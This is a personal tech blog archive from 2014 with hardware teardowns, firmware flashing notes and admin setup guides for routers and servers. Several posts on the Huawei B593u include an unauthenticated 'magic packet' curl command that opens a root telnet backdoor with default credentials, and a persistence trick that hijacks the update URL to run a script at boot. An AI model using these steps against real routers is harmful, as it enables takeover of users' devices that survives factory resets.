Saturday, November 22, 2014

Topfield TF500PVRc with TF510PVRc or TF520PVRc firmware

Latest firmware for Topfield TF500PVRc is 3.56 from 2010 while for TF510PVRc and TF520PVRc there's 3.96 from 2013.

Can you flash Topfield TF510PVRc / TF520PVRc firmware to older TF500PVRc? Yes, yes you can after changing SysID with VegaPack and it will start and appear to work just fine. However since TF500PVRc has only 32MB RAM system will quickly run out of memory. First menus will disappear and soon entire system crashes.

Flashing newer model firmware "works" only for DVB-C models. In DVB-T models (TF500PVRt / TF510PVRt / TF520PVRt) tunet was changed and while OS will run it won't be able to receive any channels.

Thursday, November 20, 2014

Buffalo WLAE-AG300N, OpenWrt Barrier Breaker and auto power on

While looking for something else I spotted Buffalo WLAE-AG300N "range extender" in IT "treature room". Noticing it's OpenWrt supported decided to give it try.

- Download OpenWrt
- Power-on Buffalo
- Wait few minutes
- Press and hold reset button until status led turns red and flashes
- Wait few minutes
- Set IP of PC to, mask, no gateway, no DNS
- Connect PC to left Ethernet port on Buffalo (looking from connector side with shiny side facing up)
- Ping - if it doesn't answer you failed
  (Manual claims default IP is, but actually it's
- Open in browser and login as "root" without password
- Click Update AirStation firmware
- Upload OpenWrt image just downloaded
- Wait few minutes until Status led turns solid green
- Change network settings on PC to DHCP client
- Ping - if it doesn't ansver you failed AGAIN!
- Open in browser and login as "root" without password
- Rest is as with any other OpenWrt device
- With OpenWrt left ethernet port is LAN, right is WAN. You can of course change this - unless you keep failing ONCE AGAIN!

By far DUMBEST thing with this device is it defaults to power off state. Meaning if you want to use it you must press power button and wait for it to start. What kind of moron engineered that? Maybe someone who's big fan of Linksys NSLU2 that suffered from same problem ten years ago.

No worries as there's workaround - all you need to do is somehow ensure power button is always pressed down. Simply put couple drops of superglue on sides of power button, wiggle it a bit so glue wicks between frame and button and then keep button pressed down until dry. Now device is in permanently powered on state which isn't bad idea especially since with OpenWrt it's not possible to shutdown this device by pressing power button. Instead kernel will hang while device stays powered up.

Sunday, November 16, 2014

Cisco CSR1000v 3.13 finally working on VMware ESXi 5.1

After many, many months of waiting Cisco finally managed to build new version of CSR1000v 3.13 that is compatible with VMware ESXi 5.1. Another quiet release without release notes. As with earlier 3.13 versions this new 03.13.01S build is available only in OVA format without purchasing license (csr1000v-universalk9.03.13.01.S.154-3.S1-ext.ova). Not to worry as you can extract ISO image and even BIN images if needed for upgrading older install from OVA.

If you're coming from 3.12 or older with eval license (which allowed creation of eval license locally) you'll need new licenses. Usual two month license is available from Cisco portal but it's extra step compared to 3.12. 

Another difference is performance levels for unlicensed and eval licensed modes. Unlicensed 3.12 is 2,5Mbit/s, eval licensed 3.12 is 50Mbit/s, unlicensed 3.13 is 0,1Mbit/s and eval licensed 3.13 is 10Gbit/s.

Wednesday, November 05, 2014

Upgrading HP Proliant firmware is easy... NOT!

Server in question was HP Proliant DL320 G6 from 2010 without any firmware upgrades ever made. Those old versions have multiple known issues, both usability, stability and hardware component compatibility related. Downtime required to perform these steps will be around 3 hours.

One might assume upgrading is as simple as booting latest HP SPP (HP Service Pack for Proliant) ISO-image using ILO2 remote console and virtual media. Not quite. It'll just get stuck in pulsing HP logo with blue bar on bottom of screen. So here's some notes how I got this working after spending too many hours testing and hunting upgrades from Internet that HP is no longer offering on their website for old servers that are out of warranty.

First you need to upgrade ILO2 firmware. You can't do it using web browser since old firmware is broken and upgrade process gets stuck at 99%. I couldn't use Windows flasher either as this server is running VMware ESXi. Even with old browser and old Java virtual media redirection is unusable slow due floods of TCP retransmissions so no possibility of booting from removable media using ILO to upgrade ILO. So we have do it using SSH

1. Download ILO2 firmware upgrade ilo2_225.bin and place it on HTTP server accessible from your management network
2. Connect to ILO using SSH with same login and password you have set for web access
3. Type "cd map1/firmware1"
4. Start firmware upgrade by typing "load -source"
5. Wait around 10 minutes for upgrade to complete
6. Login using web browser and confirm that ILO2 is now running firmware 2.25

Next we need to use old "Smart Update Firmware DVD Proliant Support Pack v10.10" from 2012 because newer SPP is not compatible with older firmwares. Don't even think about using automatic upgrade either like Firmware DVD suggests when booting from ISO image as it will just end up getting stuck in X11 desktop with default cursor. Instead use manual mode and click thru dozens of Next Next Next dialogs. This may downgrade ILO2 to 2.09 which should be ok as virtuel media problem was fixed in 2.01.

Now we can finally boot from latest SPP 2014.09 (HP_Service_Pack_for_ProLiant_2014.09.0_792934_001_spp_2014.09.0-SPP2014090.2014_0827.10.iso) ISO image. If your server is G5 or older use SPP 2014.06 (HP_Service_Pack_for_Proliant_2014.06.0_784915_001_spp_2014.06.0-SPP2014060.2014_0618.4.iso) instead. If you feel lucky you can try automatic upgrade option on boot menu. Surprisingly it did work for me.

Link to tools of trade.

Thursday, October 09, 2014

LTE 450MHz performance

Seems Ukkomobile has fixed their provisioning setup. LTE network itself came up last week, but only DNS traffic was allowed and all tcp/80 traffic was hijacked to infinite 302 redirect loop between and

Signal strength seems to be ok, getting 4 of 5 bars on leds and diagnostics page of Huawei router shows RSRP -92 dBm, RSRQ -5 dBm, SINR 9.0 dB and RSSI -75 dBm.

So it was time for quick benchmark. Speed is steady 3,5Mbit/s in and exactly same 3,5Mbit/s out. Latency without load ~20ms and while transferring data ~120ms.

Client devices get IP from Huawei router gets private IP from subnet from ISP which is then natted by provider to IP from range. Double NAT - I don't like it but that's how it is these days. Subnet is Fujitsu Finland service network and based on whois registered for Onninen Oy. Unless there's some unpublished deal between Onninen and Ukkomobile that part might be outdated information on whois registry.

DNS servers used are Google Public DNS (, Also connection doesn't seem to be completely transparent. Trying to test performance of connection using Ookla always fails in upstream test. Either preconfigured Huawei router Ukkomobile sent or something in their network is causing problems.

Cardboard box Huawei router arrived had sticker on side saying it's nn of 490 shipped from China to Ukkomobile. Since each box holds six routers with assumption that all boxes contained same equipment there's at least 6*490 = 2940 of these devices destined to Finnish market.

Friday, October 03, 2014

Inside Ukkomobile 450MHz LTE router - Huawei B593s-31A

450MHz LTE is alive!

Ukkomobile aka Ukkoverkot is currently building 450MHz LTE network in Finland. I received one of CPEs they use and it turned out to be Huawei B593s-31A with V100R001C01SPC002 firmware dated 2014-09-12. This is Android based device unlike B593u which is more traditional embedded Linux based on Broadcom code.

Since it's LTE there's SIM card like in any other 2G/3G/4G WWAN router. APN name is UkkoNet, MNC is 035 and MCC 244. Login admin, password admin and encrypted configuration file just like B593u and other B593s revisions.

Internal construction of B593s series is also quite different from older routers. There's small brains board with HiSilicon chip, some flash and RF side. Mainboard has Broadcom Wifi, Marvell Ethernet, some VoIP FXS chips and power supply.




BCM43236BKMLG, HE1423 P21

32178-FM1, 1419BLK0FY 

MARVELL 88E6071-NNC2, EP2119.5JW


DIAG connectors

 Hi6451GBC, 110CN1414, CP2071414

77192-14, 5541269

 Mainboard connector

HiSilicon Balong Hi6920, Hi6920GFC, 100, HP2561412
SK hynix, H9DA4VH2GJAM, CR4EM 352A
ANALOG DEVICES, AD80277BBCZ, #1347, 2738745.1

PCA9555, CDW012

Saturday, September 27, 2014

Cisco CSR1000v 3.13 crashes on VMware ESXi 5.1

Initial version of Cisco CSR1000v 3.13 (csr1000v-universalk9.03.13.00.S.154-3.S-ext) was broken and kept crashing while booting on VMware ESXi 5.1, but apparently does work on ESXi 5.5. Cisco has silently replaced it with 3.13S0a version (csr1000v-universalk9.03.13.00a.S.154-3.S0a-ext) without providing any release notes or even updating filedates. Which is exactly as broken as old one - stuck in infinite reboot loop.

Download is here, but for some reason for 3.13 only OVA packaged one is available after free registration. If you need ISO simply unpack OVA with 7zip and use ISO you can find inside for install.

And then it will fail. Perhaps something to do with crazy nested virtualization CSR uses. Thanks guys.

Monday, September 01, 2014

Export all SMTP addresses from Exchange using PowerShell

Tested with Exchange 2010. You'll need Exchange Management shell but no need for exchange admin rights.

Get-Recipient -ResultSize unlimited | Select Name -ExpandProperty EmailAddresses | Where-Object {$_.SmtpAddress -ne $null} | Select Name,SmtpAddress,IsPrimaryAddress | Export-csv -Encoding unicode -NoTypeInformation AllEmailAddress.csv

Sunday, August 31, 2014

How to change Atheros AR9xxx aka ath9k EEPROM values

One of my Atheros AR9280 minipcie cards had some odd undefined regulatory domain (0x6B) configured. This caused even latest Linux ath9k driver to break so I wanted to change it to valid regdom. Which ath9k developers think is sin and are trying to prevent people from doing, but luckily our old friend iwleeprom has Atheros support letting us to fix this.

# The usual preparations
apt-get update
apt-get -y install git subversion build-essential

# Download atheros branch of iwleeprom and compile it
mkdir -p /opt/iwleeprom
cd /opt/iwleeprom
svn checkout atheros
cd atheros

# Shutdown wifi
ifdown wlan0

# Find PCI ID of your device using lspci

# Mine was 03:00.0
# 03:00.0 Network controller: Qualcomm Atheros AR928X Wireless Network Adapter (PCI-Express) (rev 01)

# Init card
./iwleeprom -d 0000:03:00.0 -I

# Verify that card is properly identified
./iwleeprom -d 0000:03:00.0 -s

# Backup current eeprom content
./iwleeprom -d 0000:03:00.0 -o original.bin

# Patch country code from non-standard 0x6B to WOR5_ETSIC 0x65
cp original.bin etsic0x65.bin
echo -ne '\x65' | dd of=etsic0x65.bin bs=1 seek=520 conv=notrunc

# Program patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65.bin

# Verify that regdom was changed
# Take note of last CRC line as this is new CRC we need
# For example "CRC (eval)  : fb27"
./iwleeprom -d 0000:03:00.0 -s

# Patch eeprom to use proper CRC
# You need to reverse byte order here
cp etsic0x65.bin etsic0x65crc.bin
echo -ne '\x27\xfb' | dd of=etsic0x65crc.bin bs=1 seek=514 conv=notrunc

# Program crc patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65crc.bin

# Verify that crc matches now
./iwleeprom -d 0000:03:00.0 -s

# Export changed eeprom content
./iwleeprom -d 0000:03:00.0 -o new.bin

# Ensure what we wrote and read match
md5sum etsic0x65crc.bin new.bin

# Reload ath9k.ko
rmmod ath9k
modprobe ath9k

# Turn wifi back on
ifup wlan0

# Check dmesg for more details

Saturday, August 30, 2014

Modifying Huawei B593u firmware images using FMK

Nothing special here in my opionion, but I've seen few comments saying that FMK doesn't work with Huawei B593u. Just follow instructions below and you end up with normal firmware image having one important difference - you can telnet in as admin from LAN side of device.

This is for latest T-Mobile firmware SP106, but adjust firmware identifiers and it'll work for others as well.

# Install some tools needed
sudo apt-get update
sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic zip unzip

# Download and compile fmk
mkdir -p ~/fmk
cd ~/fmk
git clone
cd firmware-mod-kit/src

# Download and unpack B593u firmware
mkdir -p ~/fmk/106
cd ~/fmk/106
wget ""
tar xvf V100R001C748SP106.tar.bz2 

# Extract trx
~/fmk/firmware-mod-kit/ B593.trx 

# Make backup of file we're going to patch
cp -a fmk/rootfs/bin/cms fmk

# Allow inbound telnet from LAN
# Make sure your replacement string is exactly same length as original!
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s -j ACCEPT ##################|g'

# Check that original and modified binaries are same size but have different date stamps
ls -l fmk/cms fmk/rootfs/bin/cms

# Remove some unnecessary files to shrink squashfs image and keep fmk happy
rm -f fmk/rootfs/sbin/mkntfs

# Update version string in headers so device already running SP106 will accept our customized version
sed -i.bak fmk/image_parts/header.img \

# Rebuild trx

# Create new firmware archive
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C748SP106_TELNET.tar.bz2 B593.trx modem.bin help.tar.bz2 B593-small.trx

# Cleanup
sudo rm -rf fmk

Done, upload V100R001C748SP106_TELNET.tar.bz2 to your router

After firmware upgrade simply telnet from LAN to Usually first attempt fails with connection refused but try again after few seconds and it'll work. Login as "admin" with password "HW4GCPE". When in ATP prompt type "shell" to open root shell.

Almost same procedure works for B593u-91 although as I don't have u91 resulting firmware has not been tested.

mkdir -p ~/fmk/u91
cd ~/fmk/u91
tar xvf u91_r+m+h+s.tar.bz2
~/fmk/firmware-mod-kit/ B593.trx 
cp -a fmk/rootfs/bin/cms fmk
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s -j ACCEPT ##################|g'
ls -l fmk/cms fmk/rootfs/bin/cms
rm -f fmk/rootfs/sbin/mkntfs
sed -i.bak fmk/image_parts/header.img \
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx product_info modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C00SP053_TELNET.tar.bz2 B593.trx modem.bin product_info help.tar.bz2 B593-small.trx
sudo rm -rf fmk

Thursday, August 28, 2014

Inside old Motorola (Symbol) AP-5131 access point

I found couple Motorola AP-5131 802.11a/g access points today. It's old design from Symbol Technologies dating back to 2005 with manufacturing date from 2010.

Looks like those APs had very decent design and hardware specs, especially for something that old. It's running MontaVista Linux with kernel 2.4.30. Intel Xscale 425 at 266MHz, 64MB RAM, 64MB flash, 2MB bootflash, two 100Mbit/s Ethernet interfaces (Altima AC101L MII PHY), 802.3af PoE support and two minipci slots. WLAN is rare Intersil / Conexant GW3888.

Bootloader is something custom Symbol built. With JTAG pins on board, what overall seems like reference design from Intel just in different shape, it should be fairly easy to run OpenWrt on this. Figure out how GPIO are mapped, replace bootloader with RedBoot and that's about it. Stock bootloader might be fine as well, haven't really looked as this is old and there's only two of them so not really that interested myself. Especially since there's no drivers for WLAN.

Top side

Bottom side

Intel Xscale IXP425 CPU

2 * 32MiB RAM

64MiB NAND flash for OS

2MiB NAND flash for bootloader

Intersil / Conexant GW3888 based WLAN

Intersil ISL3692 radio

Complete set of images here.

Win95 / NT4 / 2000 / XP drivers for WLAN card are available from Microsoft. Some ancient FreeBSD drivers claim to support ISL3888 (which is same as GW3888), but I have some doubts if that's actually true. Intersil / Conexant codename for 3888 is "Isotope", this was on Motorola / Symbol AP-300 release notes as apparently AP-300 was upgraded from regular Prism54 to "Isotope" at some point.

Saturday, August 23, 2014

Netdisco2 on Ubuntu 14.04

Netdisco is neat tool to collect layer-2 forwarding database from switches, match MACs with layer-3 ARP table from router and present it over searchable webui.

Old "Netdisco 1" was quite horrible to setup, but it did still do its job. Recently "Netdisco 2" was released making admins life much easier and also bringing fancy new look for webui.

So here's my notes about installing new virtual machine with Netdisco 2.

# Install Ubuntu 14.04.1 LTS Server x64 with defaults

# After install login and switch to root
sudo su -

# Update system
apt-get update
apt-get -y dist-upgrade

# Add some basic tools we like
apt-get -y install openssh-server open-vm-tools build-essentials joe wget screen lftp mtr-tiny zip ntp

# Get rid of some spyware
apt-get -y remove popularity-contest

# Disable IPv6 support on next reboot
echo "net.ipv6.conf.all.disable_ipv6=1" >>/etc/sysctl.conf

# Install caching DNS server to reduce and speedup DNS queries sent when Netdisco is operating
apt-get -y install dnsmasq

# Generate config file for dnsmasq
cat <<'__EOF__' >/etc/dnsmasq.d/custom.conf

# Remove DNS breaking resolvconf package
apt-get -y remove resolvconf

# Fix DNS resolver settings to use local DNS first with Google and OpenDNS as fallback
# Normally I wouldn't use OpenDNS but I'm giving them new chance now that they stopped
# hijacking NXDOMAIN queries.
cat <<'__EOF__' >/etc/resolv.conf
options timeout:5

# Don't mess with resolv.conf via /etc/network either
sed -i.bak -e's|dns-|#dns-|g' /etc/network/interfaces

# Restart dnsmasq so our changes are activated
service dnsmasq restart

# Install Netdisco deps
apt-get -y install libdbd-pg-perl libsnmp-perl postgresql pgtune fping

# PostgreSQL configuration for better performance, defaults are good for Pentium Pro at 200MHz
mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.old
pgtune -i /etc/postgresql/9.3/main/postgresql.conf.old -o /etc/postgresql/9.3/main/postgresql.conf

# Switch to postgres user and create new SQL user
su - postgres
createuser -DRSP netdisco
# Enter some password here
createdb -O netdisco netdisco

# Switch back to root

# Netdisco install based on instructions from

# Add new user account for Netdisco
adduser netdisco --shell /bin/bash --disabled-password --gecos netdisco

# Switch to netdisco user and install required perl components under user homedir
su - netdisco
curl -L | perl - --notest --local-lib ~/perl5 App::Netdisco

# Create some links
mkdir ~/bin
ln -s ~/perl5/bin/{localenv,netdisco-*} ~/bin/

# Test install
~/bin/netdisco-daemon status

# Create config file with your postgresql username and password, default SNMP communities etc.
# See examples in ~/perl5/lib/perl5/auto/share/dist/App-Netdisco/environments/deployment.yml
cat <<'__EOF__'>~/environments/deployment.yml
  name: 'netdisco'
  user: 'netdisco'
  pass: 'S3cretForYouAndMe'
safe_password_store: true
  - tag: 'default_1'
    community: 'notsopublic'
    read: true
    write: false
  - tag: 'default_2'
    community: 'public'
    read: true
    write: false
     when: '5 1,7,13,19 * * *'
     when: '35 1,7,13,19 * * *'
     when: '45 1,7,13,19 * * *'
     when: '55 1,7,13,19 * * *'
     when: '15 23 * * *'
  max_outstanding: 50
  tasks: 'AUTO * 5'

# Build initial database
# You will be asked for webui admin credentials etc.

# Create script to start Netdisco
cat <<'__EOF__' >~/
~/bin/netdisco-web start
sleep 5
~/bin/netdisco-daemon start
chmod a+x ~/

# Launch it

# Verify functionality with browser by opening
# Login using admin account just created
# Enter IP of switch or router to add and click discover
# If you have proper SNMP communities and LLDP/CDP settings in place it should discover entire site straight away

# Return to root shell

# Autostart netdisco after reboot
echo "( sudo su - netdisco -c '/home/netdisco/' ) &" >/etc/rc.local

# Following steps are needed only if you don't have SNMP read access to upstream router
# but have Linux server in subnet you want to monitor.

# Enable local SNMP server
apt-get -y install snmpd
mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.old
cat <<'__EOF__'>/etc/snmp/snmpd.conf
rocommunity notsopublic
sysservices 79
# only listens on lo interface assuming this is same host that Netdisco is running

# Fix logging, otherwise syslog is flooded with bogus errors
sed -i.bak /etc/default/snmpd -e's|Lsd|LS6d|g'

# Restart snmp
service snmpd restart

# Because we don't have SNMP read rights to ISP router we must keep local ARP table populated manually
fping -g   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100

# Discover via Netdisco webui next

# Schedule fping to run slightly before arpnip/arpwalk
cat <<'__EOF__' >>/etc/crontab
     when: '45 1,7,13,19 * * *'
44 1,7,13,19 * * * fping -g   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100 >/dev/null 2>/dev/null

# Restart cron
service cron restart

# Now would be good time to restart server so all changes are applied and to make sure Netdisco 
# will come up after boot.

# Later to install netdisco updates
# (Take backup first.. of course)

# Switch to netdisco user
sudo su - netdisco

# upgrade Netdisco
~/bin/localenv cpanm --notest App::Netdisco

# apply database schema updates

# restart web service
~/bin/netdisco-web restart

# restart job daemon
~/bin/netdisco-daemon restart

Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

Public Huawei document I linked couple days ago mentioned factory diagnostics tool called "Huawei deviceLocker V0.1" that will grant access to root shell on router. I got curious on how this would actually work and came to conclusion it must be something extremely simple and insecure, it IS Huawei after all. Did some poking around /bin/web process I figured this out - it's all there in clear-text for anyone to read. And that admin password is in Huawei docs, not exactly secret either. In case you didn't realize there's no need for authentication to exploit this. Protip: Try to hide you backdoors a bit better next time.

# Send magic packet that enables telnet, timeout error is expected
curl -m5 \
-d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \

# if telnet says connection refused keep trying every few seconds, it'll work
# if telnet just hangs and timeouts then port is not open and no point retrying with telnet
# login: admin
# pass: HW4GCPE
# type "shell" or "sh" to open root shell

To be fair Huawei is at least trying since this backdoor HAS been closed recently. Not that I could find any public disclosure about exactly this hole. B593u is rather common device (at least in Europe) and most operators still only distribute old firmware versions where this hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (which are latest known firmwares for B593U-12) have slightly different /bin/web binary than older builds. Newer versions still have same backdoor function present using same "handshake", but portconfig.cgi is no longer in list of accepted URLs. It's not actual CGI, /bin/web simply have list of URLs and which internal functions to trigger for them. This list have been edited to either remove this backdoor, or worse, to hide it and still allow triggering in some other way.

So unless you're willing to take risk with flashing unsupported firmware customized for another operator your router is just waiting to be hacked. Hacked permanently that is.

Combined with persistent hack I posted few hours ago malicious hackers could seriously own device and not even factory reset paired with full firmware upgrade can help you. Or have you seen many anti rootkit tools for routers lately?

Persistent customizations to Huawei B593u with stock firmware

Perhaps you're fairly satisfied with Huawei stock firmware but would like to fix some security problems and remove spyware installed by factory. There's fairly easy way to do this.

You need root level access to shell on device via one of many vulnerabilities present. This one is easy. Compiling new binaries with stock Broadcom toolchain is easy as well. Problem is how to make them persistent so customizations made load when device is rebooted.

Answer is actually quite simple. Create script under /upgflash - which is 256MB USB flash device embedded inside router. Let's be creative and call this script "rc.local". Inside script put following two lines:

/bin/iptables -I INPUT -s -j ACCEPT

Make script executable. This will after each reboot grant you telnet access to device from internal subnet (assuming default IP range).

Export current configuration from flash to /tmp/flashinfo.bin.
flashtest export e00000 262144

Load file in hex-editor and search for "HttpUpg UpdateURL". Depending on your location it'll be something like "". Replace this with ";/upgflash/rc.local;". Just make sure to keep string length intact so you don't have to update content length info in beginning of flashinfo.bin. DO NOT MAKE FILE BIGGER THAN 262144 BYTES, OTHERWISE YOU'LL END UP OVERWRITING FACTORY DEFAULT CONFIG -> DEAD DEVICE NEXT TIME YOU DO FACTORY RESET.

Write modified configuration back to device
flashtest load flashinfo.bin e00000

Reboot with force to make sure our config stays
reboot -f

What this does is trick system to execute /upgflash/rc.local script on every reboot instead of sending your device and SIM information to Huawei.

You can safely use around 100MB of /upgflash without running into risk of breaking things when doing firmware upgrades. This modification will also persist between firmware upgrades although I highly recommend doing factory reset, upgrade and then adding hacks back. For example you don't want to mess with modem firmware upgrade process and end up bricking it.

What to do with this hack? Like said compile binaries with broadcom toolchain and use them. Perhaps even chrooted mipsel debian on usb stick so you don't have to be limited to Huawei world.

Unlike major modifications such as replacing stock firmware with OpenWrt this will let you keep stock features while also make it possible to add new customizations.


It's possible to compile working binaries with toolchain from Asus router using same chipset. Below works for Ubuntu 14.04 x64.

apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 unzip
mkdir -p /opt/asus
cd /opt/asus
cd GPL_RT_N53_30043744561
tar xvf GPL_RT-N53_3. 
mv asuswrt /opt/
ln -s /opt/asuswrt/tools/brcm /opt/brcm

When compiling:

export PATH=$PATH:/opt/brcm/hndtools-mipsel-linux/bin:/opt/brcm/hndtools-mipsel-uclibc/bin
./configure --build=x86_64-linux-gnu --host=mipsel-linux-uclibc


Saturday, August 16, 2014

Unpacking Huawei B593u compressed Broadcom CFE bootloader

Sorry, one more B593u post but felt this is worth documenting.

While hacking my way into Huawei B593u I had big problem with Huawei crippled CFE bootloader. It was not talking to me and when I finally did get it to talk to me it was only one way. All I could see was CFE> prompt after smashing ^C but nothing else.

I had already dumped CFE from flash by now so I obviously went to check it out but there was not much to see. So I ran binwalk and it told me CFE contained LZMA compressed data. Ah-ha! Initial bootloader decompresses LZMA part which will contain all the juicy bits.

Yet I couldn't unpack this LZMA blob. It was not total misidentification by binwalk either, clearly compressed data. Maybe it's not LZMA? After some failed attempts I remembered similar problem with Realtek squashsfs couple years ago. Back then problem was due newer LZMA decompressors being incompatible with outdated versions all these WiFi SoC vendors love to use.

I was able to extract Huawei compressed CFE using binary named "lzma_4k" which is part of Asus RT-N56U GPL release. I don't have sources for this so you'll need Linux system capable of running i386 binaries. Compiling old enough LZMA SDK might be enough, lzma_4k identifies itself as "LZMA Utility 4.63 : Igor Pavlov : Public domain : 2008-12-31", but no idea how many patches from Broadcom it contains.

# Find offset of compressed CFE
binwalk 0x000000-0x040000.bootloader 

38132           0x94F4          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 219824 bytes

# Skip beginning
dd if=0x000000-0x040000.bootloader bs=38132 skip=1 of=boot.lzma

# Get compatible lzma binary
wget --no-check-certificate ""

# Unpack
lzma_4k d boot.lzma boot

Quick "strings" on uncompressed boot loader reveals some interesting nvram parameters, namely "console_disable" which we simply set to 0 and like that serial port comes alive with CFE

Latest modem.bin LTE dongle firmware for Huawei B593u-12

Latest modem.bin firmwares currently available are T-Mobile customized 11.533.03.03.748 (2013-09-30) from SP105 and generic 11.433.61.00.00 (2012-12-04) from Polkomtel SP103. While these are customized for EM920u according to few forum posts I've found they work equally with Huawei USB LTE dongles such as E392 part of same MDM9200 family.

Polkomtel one is generic as there's no operator ID in end of firmware version. Which means T-Mobile has requested some sort of LTE modem firmware customizations from Huawei. I haven't noticed any difference in functionality myself, but depending on your operator there might be some.

You can check version after opening SSH connection to router using "lteat" command.

# lteat

Vodafone B2000 branded Huawei B593u-12 running T-Mobile SP105 with T-Mobile modem.bin (11.533.03.03.748 / 2013-09-30)
   (0: 1)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 1) (28: 1 1) (29: 1) 

Vodafone B2000 branded Huawei B593u-12 running Polkomtel SP103 with generic modem.bin (11.433.61.00.00 / 2012-12-04)
   (0: 0)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0) 
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 0) (28: 1 1) (29: 1) 

Did you spot it? #27 is different. Not that I would much idea what that means or if it matters. Quick googliohakuplaza search says it doesn't matter as long as SIM card used works with modem firmware. So it's not like some frequency would be disabled or other nasties.

This forum post provides bit more information of these registers, but not much about #27 we're most interested.

0       Replace Firmware Version                True
1       ?Forbid 2G registration                 False
2       Forbid AT^CURC type/port                False
3       Change Mean TPT Size                    False
4       Change MTU size                         False
5       Replace Product ID (PID)                False
6       Change APN values                       False
7       Disable Video Calls                     False
8       Change USSD Mode                        False
9       Change? Full Frequency Scan             False
10      ?       LED Light                       False
11      Exclusive Cardlock                      False
12      Huawei Special SIM lock                 True
13      Permanent Cardlock                      False
14      Class-0 SMS Route                       False
15      Roaming HPLMN (count?)                  False
16      Diasble RPLMN (PME?)                    False
17      Change GPRS Recent Activity Timer       False
18      Change Default Traffic Class            False
19      Change STK                              False
20      Huawei Manual 3G? band Search Order     False
21      Current ^SYSCFGEX Mode List             False
22      Get/Set Attach PDP Parameters           False
23      Disable F-DPCH (WCDMA)                  True
24      Huawei IPV4 and IPV6 Configuration      N/A
25*     ?       Modified UI Network PLMN        False
26      [1] GID1 Customer Forbid Band           False
27      [1] Start Telus GID1 check              True for T-Mobile, False for generic / Polkomtel
28*     Set HS-DSCH Physical Layer Category     True
29      [1] Set GID1 LTE Band Preference        True

*   Returns 2 digits in E589u-12. 
[1] GID1 = "Group Identifier Level 1" and is a type of SIM network 
    lockout mechanism. The GID1 elementary files on the SIM are 

    specified in GSM 11.11 (ETS 300 977)

Differences of Huawei B593u and B593s

I got few B593u models and it's pretty straight forward Broadcom BCM5358 based router with Linux. As usual GPL sources were never published by Huawei crooks. LTE modem side is simply Qualcomm MDM9200 based Huawei USB dongle connected internally to Broadcom SoC over USB.

Perhaps luckily I don't have any B593s models, since unpacking firmware shows it's Huawei HiSilicon Hi6920 (HiSilicon V71R paired with Balong 710 baseband) based and running concurrently both VxWorks 6.8 and Android. Huawei E5172 is probably closely related. Huawei code looks like VxWorks bits are very much baseband related leaving rest of intelligence for Android side.

In essence this is much more closer to Android mobile phone or tablet with wired ports than traditional broadband router. Perhaps one core is running Android while another is VxWorks? There's even two different Linux kernels referenced. Are they both used in addition to VxWorks? Hard to say from just firmware image as these things are filled with dead code paths and features which never gets used.

Partitions present:
BootLoad, NvBackLTE, NvBackGU, BootRom, VxWorks, Logo, FastBoot, kernel, yaffs0 .. yaffs6 and cdromiso.

Balong V7R1 MCore bootloader...
Compile date: May 14 2013
Compile time: 11:54:47
press space key to enter bootrom:
ERROR:too many fails ,VXWORKS region is damaged, switch to BOOTROM.


ARM RealView PBX-A9
HiLteFe(0,0) host:vxWorks h= e= u=anonymous pw= tn=targetname
OM_AutoConfig: The config file is not exsit!
OM_AutoConfig: The Msg Len is too big : %d!
Secure Storage Key
Debug port protect Secure Storage Key
Integrity Protection Key
Secure Storage Key
AT Secure Storage Key
Secure AT Key
RRC_OMITF_ProcMaxTxPowerReq:input ptr null! ulMsgId =, pMsg =
RRC_OMITF_ProcMaxTxPowerReq, MaxTxPower

root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0 rdinit=/init mem=144m
Linux MBB-V7R1-CPE 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:09:38 UTC 2010 x86_64 GNU/Linux

root=/dev/ram0 rw console=ttyAMA0,115200 rdinit=/linuxrc mem=28M
Linux version (q81003564@MBB-V7R1-CPE) (gcc version 4.5.1 (ctng-1.8.1-FA) ) #1 PREEMPT Tue May 14 11:52:35 CST 2013

on boot
    setprop ARGH ARGH
    setprop net.eth0.dns1
    setprop net.gprs.local-ip
    setprop no
    setprop generic
    setprop ro.product.device generic# mount mtd partitions
# Mount /system rw first to give the filesystem a chance to save a checkpoint
    mount yaffs2 mtd@/yaffs2 /data
    mount yaffs2 mtd@/yaffs1 /system
    mount yaffs2 mtd@/yaffs1 /system ro remount
    mount yaffs2 mtd@/yaffs3 /app
#    mount yaffs2 mtd@/yaffs5 /online
    mount yaffs2 mtd@/yaffs4 /cpedata
        mount yaffs2 mtd@/yaffs4 /cpedata ro remount
